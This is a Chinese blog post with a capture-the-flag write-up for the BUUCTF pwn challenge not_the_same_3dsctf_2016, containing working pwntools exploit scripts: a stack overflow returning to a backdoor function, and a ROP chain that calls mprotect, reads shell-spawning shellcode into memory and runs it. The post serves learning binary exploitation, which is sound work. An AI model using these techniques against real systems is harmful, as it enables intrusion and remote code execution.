BUUCTF-not_the_same_3dsctf_2016

最新推荐文章于 2023-01-12 20:29:14 发布
最新推荐文章于 2023-01-12 20:29:14 发布
阅读量1.6k 收藏 5
点赞数 4
分类专栏: CTF 文章标签: ctf pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fzuim/article/details/114298822
版权

这是一道pwn题目

IDA查看伪代码

main函数gets函数存在栈溢出攻击
在这里插入图片描述
通过查看字符串列表,发现有个get_secret读取flag.txt后门函数
在这里插入图片描述

查看编译属性

在这里插入图片描述

思路1,本地可打通,远程不行

也是最简单的,payload构造溢出返回到get_secret函数,并printf打印出fl4g,payload如下

#coding=utf8
from pwn import *

context.log_level = 'debug'

#r = process('./not_the_same_3dsctf_2016')
r = remote('node3.buuoj.cn', 29184)

backdoor_addr = 0x080489A0
str_flag_addr = 0x080ECA2D
printf_addr = 0x0804F0A0
         
# 这个main函数没有push ebp 所以不用再覆盖4字节的ebp
payload = 0x2D * 'a' + p32(backdoor_addr)
payload += p32(printf_addr) + p32(1) + p32(str_flag_addr)

r.sendline(payload)
             
print(r.recv())

思路2,正确解法

利用mprotect函数,直接放直接笔记

# mprotect函数的利用,将目标地址:.got.plt或.bss段 修改为可读可写可执行
int mprotect(const void *start, size_t len, int prot);
argu1 为mprotect函数的第一个参数 (被修改内存的地址) 设置为 0x0x80EB000 (ida-ctrl+s 查看.got.plt/.bss起始地址) 
argu2 为mprotect函数的第二个参数 (被修改内存的大小) 设置为 0x1000 (0x1000通过程序启动时查看该内存块的大小的到的)
argu3 为mprotect函数的第三个参数 (被修改内存的权限) 设置为 7 = 4 + 2 +1 (rwx)

elf = ELF('./pwn')
# ROPgadget --binary get_started_3dsctf_2016 --only 'pop|ret' | grep pop
pop3_addr = 0x0806fcc8 # pop esi ; pop ebx ; pop edx ; ret
payload = 0x2D * 'a' + 0x4 * 'b' + p32(elf.symbols['mprotect'])
payload += p32(pop3_addr) # 返回地址覆盖为pop3,目的为了栈还原,因为mprotect传入了三个参数,需要连续3个pop
payload += p32(argu1) + p32(argu2) + p32(argu3)
# 紧接着返回地址为 read对修改的目标地址写入shellcode
payload += p32(elf.symbols['read']) 
payload += p32(pop3_addr) # 同样栈还原,为了执行紧接着的 目标地址
payload += p32(0) + p32(argu1) + p32(0x100)
# read写完后 写入执行的目标地址
payload += p32(argu1)
# 先进行sendline执行到read等待输入
sh.sendline(payload)
# 继续sendline发送shellcode
sh.sendline(asm(shellcraft.sh(), arch = 'i386', os = 'linux'))
# 进入交互模式
sh.interactive()

正确payload如下

#coding:utf-8
from pwn import*

context.log_level = 'debug'
context(arch='i386', os='linux')

local = 0
proc_name = './not_the_same_3dsctf_2016'
elf = ELF(proc_name)

# 这道题本地和远程两种解法,真的干。。。
if local:
    sh = process(proc_name)
	str_flag_addr = 0x080ECA2D
    backdoor_addr = 0x080489A0
    printf_addr = 0x0804F0A0

    payload = 0x2D * 'a' # 这边不用覆盖ebp,在于get_flag并没有push ebp
    payload += p32(backdoor_addr) + p32(printf_addr)
    payload += p32(str_flag_addr)
    sh.sendline(payload)
else:
    sh = remote('node3.buuoj.cn', 28308)
    mprotect_addr = elf.symbols['mprotect']
    read_addr = elf.symbols['read']
    pop3_edi_esi_ebx_ret = 0x0806fcc8
    mem_addr = 0x080EB000 #.got.plt 的起始地址
    mem_size = 0x1000
    mem_type = 0x7 # 可执行权限

    payload = 0x2D * 'a'
    payload += p32(mprotect_addr)
    payload += p32(pop3_edi_esi_ebx_ret)
    payload += p32(mem_addr) + p32(mem_size) + p32(mem_type)
    payload += p32(read_addr)
    payload += p32(pop3_edi_esi_ebx_ret)
    payload += p32(0) + p32(mem_addr) + p32(0x100)
    payload += p32(mem_addr)    #将read函数的返回地址设置到我们修改的内存的地址,之后我们要往里面写入shellcode
    sh.sendline(payload)
    # read写入shellcode
    payload = asm(shellcraft.sh())
    sh.sendline(payload)

sh.interactive()

答案

在这里插入图片描述

Fzuim
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
ts9_annot_arrow_hvplot PyViz interacti_bokeh_STL_seasonal_decomp_HodrickP_KPSS_F-stati_Box-Cox_Ljung
Linli522362242的专栏
11-18 6212
ts9_annot_arrow_interactive bokeh_STL(add:cycle +trend+residual normality)_seasonal_decomp(add&multiplicative)_Hodrick-Prescott(add:cycle trend)_KPSS_F-statistic_Box-Cox_Ljung-Box(autocorrelation:group of lags)_homo同方_heter异方差_Q-Q probabilityPlot freq=None
mpf4_定价欧式美式障碍Options_CRR_Leisen-Reimer_Greeks_二叉树三叉树网格_Finite differences(显式隐式)Crank-Nicolson_Imp波动率
热门推荐
Linli522362242的专栏
07-18 3万+
mpf4_pricing European, American options and exotic options_CRR(Cox-Ross-Rubinstein)_Leisen-Reimer_Greeks_binomial trees_trinomial trees_Lattices_Finite differences(explicit method, implicit method)Crank-Nicolson_bisection_implied volatility curve
buuctf——not_the_same_3dsctf_2016
qq_41560595的博客
03-26 471
这道题和前面分析过的get_started_3dsctf_2016差不多,换汤不换药。 选择一个地址0x080EB000,用来装shellcode。这个地址要改成可执行的。使用mprotect函数改变。 解题代码: from pwn import * #p=process("./not") p=remote("node3.buuoj.cn",29607) elf=ELF("./not") read=elf.symbols["read"] mprotect=elf.symbols["mprotect"] m
BUUCTF not_the_same_3dsctf_2016
红叶的博客
10-31 211
本题目本地与远程得用两种方案打。
BUUCTF - PWN】not_the_same_3dsctf_2016
古月浪子的博客
03-27 1550
checksec一下,可以栈溢出 IDA打开看看,直接可以溢出 有一个后门函数,会把flag放在bss段上 程序有write函数,通过rop把flag打印出来 from pwn import * from LibcSearcher import * context.os='linux' context.arch='i386' context.log_level='debug' sl=la...
[BUUCTF]PWN14——not_the_same_3dsctf_2016
mcmuyanga的博客
08-29 1964
[BUUCTF]PWN14——not_the_same_3dsctf_2016 题目网址:https://buuoj.cn/challenges#not_the_same_3dsctf_2016 步骤: 例行检查,32位,开启了nx保护 nc一下看看程序大概的执行情况,没看出个所以然 32位ida载入,shift+f12查看程序里的字符串,发现flag.txt 双击跟进,ctrl+x找到调用这个字符串的函数,可以看到,这个函数将flag读了出来,存放到了unk_80F91B的位置,我们要想办法将这个地
buuctf之 not_the_same
qq_42728977的博客
02-19 627
题目:not_the_same_3dsctf_2016 环境:ubuntu14 漏洞点:栈溢出、mprotect、shellcode 思路:使用mprotect更改内存权限,通过栈溢出更改程序流程,读入shellcode并执行 参考链接: get_started_3dsctf_2016-Pwn get_started_3dsctf_2016-Pwn 上来就这,感觉这个题很简单啊。 再看看函数列表...
BUUCTF-CRYPTO-强网杯2019 Copperstudy
zippo1234的博客
11-01 2975
BUUCTF-CRYPTO-强网杯2019 Copperstudy[强网杯2019] Copperstudy题目分析开始1.题目2.第0层3.第1层4.第2层5.第3层6.第4层7.第5层8.第6层9.get flag结语 每天一题,只能多不能少 [强网杯2019] Copperstudy 题目分析 RSA套娃,各种类型的RSA,对于我现在的水平来说真的是难于上青天。鉴于道奇时隔32年又夺冠军(28日的事了),今天就先记录下来。以后慢慢看 hash破解 e=3 已知p高位攻击 已知d低位攻击 低加密指数广
buuctf not_the_same_3dsctf_2016
carol2358的博客
04-16 276
一开始没看到get_secret函数,去用mprotect去做了,结果报错卡住了。 思路是用write把get_serect写到bss里的flag显示出来,write bss就可以。 exp: from pwn import * from LibcSearcher import * context(log_level = 'debug',arch ='i386',os = 'linux'...
buu not_the_same_3dsctf_2016
weixin_51298357的博客
01-30 210
buu not_the_same_3dsctf_2016 刚拿到题 刚打开的时候很懵,main函数里只有一个fopen函数和一个fgets函数,点半天也没查到什么。没有办法,shift+f12 :查看程序内的字符串,发现了flag.txt 双击跟进,ctrl+x找到调用这个字符串的函数,可以看到,这个函数将flag读了出来,存放到了unk_80F91B的位置。我们找到了flag的位置。接下来就要尝试把它读取出来就好了。 到这里,结合一开始看见的gets函数,得到了第一个思路:利用gets函数覆盖返回地址去
[PWN] BUUCTF not_the_same_3dsctf_2016 1 Writeup
Csome
05-21 551
解题 checksec 先checksec一下,发现没有开canary方便了栈溢出,PIE也没开 反编译 IDA反编译 main函数 get_secret函数 分析利用 程序先进入main函数,有一个gets(无限长度的栈溢出) get_secret函数是将flag.txt读入bss段中,并没有做输出的操作 思路:,在main函数中修改main函数的返回地址,返回到get_secret函数中,读取flag,再返回到mian函数中(第二次进入main函数),修改返回地址为printf的地址,传入flag
BUUCTFPWN】not_the_same_3dsctf_2016
m0_55368674的博客
01-12 355
BUUCTF - PWN】not_the_same_3dsctf_2016题解
CTF】not_the_same_3dsctf_2016
凉水的博客
01-30 3809
解题思路 1 先反编译,找到mian函数 undefined4 main(void) { char local_2d [45]; printf("b0r4 v3r s3 7u 4h o b1ch4o m3m0... "); gets(local_2d); return 0; } 一看到gets,就觉得靠谱了。 2 下一步找可利用函数,构造利用链。随便翻函数列表,没找到system以及/bin/sh,说明没有可以直接获取shell的方法;再继续翻,看到了get_secret函数,以及_
BUUCTF not_the_same
doudoudedi
10-03 373
开始以为是简单的栈溢出发现可以调用的函数很少 而且开启了nx,leak不了libc。这里需要将bss段设置成可读可写可执行,然后跳到bss段执行shellcode 我这里参数中有地址最好使用gadget exp: from pwn import * def debug(): gdb.attach(p) p=process('./notsame') #p=remote('node2.buuoj...
BUUCTF-PWN-not_the_same_3dsctf_2016
Henlenl的博客
05-19 195
文章目录查看文件信息IDA静态分析exp 查看文件信息 开了个NX保护 IDA静态分析 开始看上去 其实就是利用gets()来溢出的 我们可以 shift+f12 查看字符串 可以看到 flag.txt 这个字符串 我们进去看一看…开始的思路其实是利用gets函数溢出来覆盖返回地址去读出flag,然后利用get_secret函数的输入点造成溢出覆盖返回地址到write函数的地址,打印出unk_80CF91B里面储存flag的内容,但是要知道的是,fgets函数其实是有保护机制的,所以我们利用这个是读
[BUUCTF-pwn]——not_the_same_3dsctf_2016
Y_peak的博客
02-10 826
not_the_same_3dsctf_2016 题目地址:https://buuoj.cn/challenges#not_the_same_3dsctf_2016 首先checksec一下,看看32位程序 在IDA中,发现栈溢出典型函数gets函数,这里注意这个main函数没有ebp shift+F12看下,发现了flag.txt这种敏感 字符串 找到调用的函数get_secret函数 函数调用后,flag储存在fl4g里面,我们找到fl4g的位置 找到可以输出的write函数 下面我们就可
not_the_same_3dsctf_2016
m0sway的博客
03-28 269
not_the_same_3dsctf_2016 WriteUp BUU PWN
version: '3' services: kafka01: image: wurstmeister/kafka:latest ports: - 19092:9092 environment: - KAFKA_BROKER_ID=0 - KAFKA_ZOOKEEPER_CONNECT=192.168.233.129:12181 - KAFKA_ADVERTISED_LISTENERS=PLAINTEXT://192.168.233.129:19092 - KAFKA_LISTENERS=PLAINTEXT://0.0.0.0:9092 container_name: kafka01 tty: true restart: always 给坐上持久化
最新发布
07-12
To add persistence to the Kafka container, you can add a volume to the `docker-compose.yml` file. Here's an updated version with persistence: ```yaml version: '3' services: kafka01: image: wurstmeister/kafka:latest ports: - 19092:9092 environment: - KAFKA_BROKER_ID=0 - KAFKA_ZOOKEEPER_CONNECT=192.168.233.129:12181 - KAFKA_ADVERTISED_LISTENERS=PLAINTEXT://192.168.233.129:19092 - KAFKA_LISTENERS=PLAINTEXT://0.0.0.0:9092 container_name: kafka01 tty: true restart: always volumes: - ./kafka/data:/kafka/data - ./kafka/logs:/kafka/logs ``` In this updated configuration, two volumes are added: `./kafka/data` and `./kafka/logs`. These volumes will map the Kafka container's data and logs directories to the corresponding directories on the host machine, allowing for persistence of data and logs even if the container is recreated. Make sure to create the `kafka/data` and `kafka/logs` directories in the same location as your `docker-compose.yml` file before running `docker-compose up -d`.
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值